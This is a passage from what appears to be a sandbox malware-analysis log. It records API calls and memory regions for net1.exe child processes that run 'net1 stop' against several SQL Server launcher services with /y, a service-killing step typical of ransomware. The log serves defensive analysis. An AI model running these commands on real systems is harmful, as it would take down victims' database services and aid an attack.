(lpLibFileName="NETMSG") returned 0x75290000 [0105.541] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.542] GetFileType (hFile=0xb) returned 0x2 [0105.543] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af758 | out: lpMode=0x1af758) returned 1 [0105.543] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af750, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x1af750*=0x1e) returned 1 [0105.543] GetFileType (hFile=0xb) returned 0x2 [0105.543] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af758 | out: lpMode=0x1af758) returned 1 [0105.544] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af750, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x1af750*=0x2) returned 1 [0105.544] _ultow (in: _Dest=0x889, _Radix=1767360 | out: _Dest=0x889) returned="2185" [0105.544] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.544] GetFileType (hFile=0xb) returned 0x2 [0105.544] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af758 | out: lpMode=0x1af758) returned 1 [0105.545] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af750, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x1af750*=0x34) returned 1 [0105.545] GetFileType (hFile=0xb) returned 0x2 [0105.545] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af758 | out: lpMode=0x1af758) returned 1 [0105.545] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af750, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x1af750*=0x2) returned 1 [0105.546] NetApiBufferFree (Buffer=0x224d50) returned 0x0 [0105.546] NetApiBufferFree (Buffer=0x22c100) returned 0x0 [0105.546] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher /y" [0105.546] exit (_Code=2) Process: id = "208" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5b636000" os_pid = "0xc80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "203" os_parent_pid = "0xd08" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8243 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8244 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8245 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8246 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8247 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8248 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8249 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8250 start_va = 0xff4c0000 end_va = 0xff4f2fff entry_point = 0xff4c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8251 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8252 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8253 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8254 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 8332 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 8333 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8334 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8335 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8336 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8337 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8338 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8339 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 8340 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8341 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8342 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8343 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8344 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8345 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8346 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8347 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8348 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8349 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8350 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8351 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8352 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8353 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8354 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8355 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8356 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8357 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8374 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 662 os_tid = 0x6f8 [0105.589] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fed0 | out: lpSystemTimeAsFileTime=0x24fed0*(dwLowDateTime=0xf4161b30, dwHighDateTime=0x1d48689)) [0105.589] GetCurrentProcessId () returned 0xc80 [0105.589] GetCurrentThreadId () returned 0x6f8 [0105.589] GetTickCount () returned 0x2423d [0105.589] QueryPerformanceCounter (in: lpPerformanceCount=0x24fed8 | out: lpPerformanceCount=0x24fed8*=1815250700000) returned 1 [0105.591] GetModuleHandleW (lpModuleName=0x0) returned 0xff4c0000 [0105.591] __set_app_type (_Type=0x1) [0105.591] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4d9c9c) returned 0x0 [0105.591] __getmainargs (in: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788, _DoWildCard=0, _StartInfo=0xff4e479c | out: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788) returned 0 [0105.591] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.591] GetConsoleOutputCP () returned 0x1b5 [0105.769] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4ecec0 | out: lpCPInfo=0xff4ecec0) returned 1 [0105.770] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.772] sprintf_s (in: _DstBuf=0x24fe78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.772] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.774] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0105.774] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0105.774] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" [0105.774] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24fc10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0105.774] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.774] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fe68 | out: Buffer=0x24fe68*=0x36c100) returned 0x0 [0105.774] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fe68 | out: Buffer=0x24fe68*=0x36c120) returned 0x0 [0105.774] _fileno (_File=0x7fefdba2a80) returned 0 [0105.774] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0105.775] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.775] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.775] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.775] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.775] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.775] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.775] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.775] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.775] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.775] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.775] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.775] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.775] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.775] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.775] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.775] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.775] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.775] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.775] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.775] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.775] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.775] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0105.775] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0105.775] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0105.775] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0105.775] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0105.776] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SBSMONITORING") returned -7 [0105.776] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SBSMONITORING") returned -7 [0105.776] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SBSMONITORING") returned -6 [0105.776] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SBSMONITORING") returned -6 [0105.776] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SBSMONITORING") returned -5 [0105.776] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SBSMONITORING") returned -5 [0105.776] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0105.776] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SBSMONITORING") returned 3 [0105.776] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.776] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.776] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.776] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.776] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.776] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.776] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.776] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.776] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SBSMONITORING") returned 7 [0105.776] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SBSMONITORING") returned 8 [0105.776] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SBSMONITORING") returned 8 [0105.776] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0105.776] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SBSMONITORING") returned -14 [0105.776] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0105.776] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0105.776] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SBSMONITORING") returned 1 [0105.776] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0105.776] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0105.776] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0105.776] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0105.776] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0105.776] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0105.776] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 3 [0105.777] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned -9 [0105.777] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0105.777] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.777] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.777] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0105.777] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0105.777] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0105.777] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SBSMONITORING") returned 1 [0105.777] _wcsupr (in: _String="MSSQLFDLauncher$SBSMONITORING" | out: _String="MSSQLFDLAUNCHER$SBSMONITORING") returned="MSSQLFDLAUNCHER$SBSMONITORING" [0105.777] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x36ce30 [0105.782] GetServiceKeyNameW (in: hSCManager=0x36ce30, lpDisplayName="MSSQLFDLAUNCHER$SBSMONITORING", lpServiceName=0xff4e5750, lpcchBuffer=0x24fd88 | out: lpServiceName="", lpcchBuffer=0x24fd88) returned 0 [0105.783] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -12 [0105.783] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -14 [0105.783] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0105.783] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0105.783] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0105.783] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0105.783] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0105.783] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0105.783] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0105.783] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0105.783] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 3 [0105.783] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -9 [0105.783] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -1 [0105.783] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0105.784] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0105.784] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0105.784] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -1 [0105.784] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -12 [0105.784] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 1 [0105.784] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SBSMONITORING", opcode=0x0, arg=0x0, bufptr=0x24fd90 | out: bufptr=0x24fd90) returned 0x889 [0105.785] wcscpy_s (in: _Destination=0xff4e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.785] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0105.786] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.787] GetFileType (hFile=0xb) returned 0x2 [0105.787] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fc58 | out: lpMode=0x24fc58) returned 1 [0105.788] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24fc50, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x24fc50*=0x1e) returned 1 [0105.788] GetFileType (hFile=0xb) returned 0x2 [0105.788] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fc58 | out: lpMode=0x24fc58) returned 1 [0105.789] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24fc50, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x24fc50*=0x2) returned 1 [0105.789] _ultow (in: _Dest=0x889, _Radix=2424000 | out: _Dest=0x889) returned="2185" [0105.789] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.789] GetFileType (hFile=0xb) returned 0x2 [0105.789] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fc58 | out: lpMode=0x24fc58) returned 1 [0105.790] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24fc50, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x24fc50*=0x34) returned 1 [0105.790] GetFileType (hFile=0xb) returned 0x2 [0105.790] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fc58 | out: lpMode=0x24fc58) returned 1 [0105.790] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24fc50, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x24fc50*=0x2) returned 1 [0105.791] NetApiBufferFree (Buffer=0x36c100) returned 0x0 [0105.791] NetApiBufferFree (Buffer=0x36c120) returned 0x0 [0105.791] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" [0105.791] exit (_Code=2) Process: id = "209" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5dcf5000" os_pid = "0x584" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "200" os_parent_pid = "0x9ec" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8255 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8256 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8257 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8258 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8259 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8260 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8261 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8262 start_va = 0xff4c0000 end_va = 0xff4f2fff entry_point = 0xff4c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8263 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8264 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8265 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8266 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8267 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 8268 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8269 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8270 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8271 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8272 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 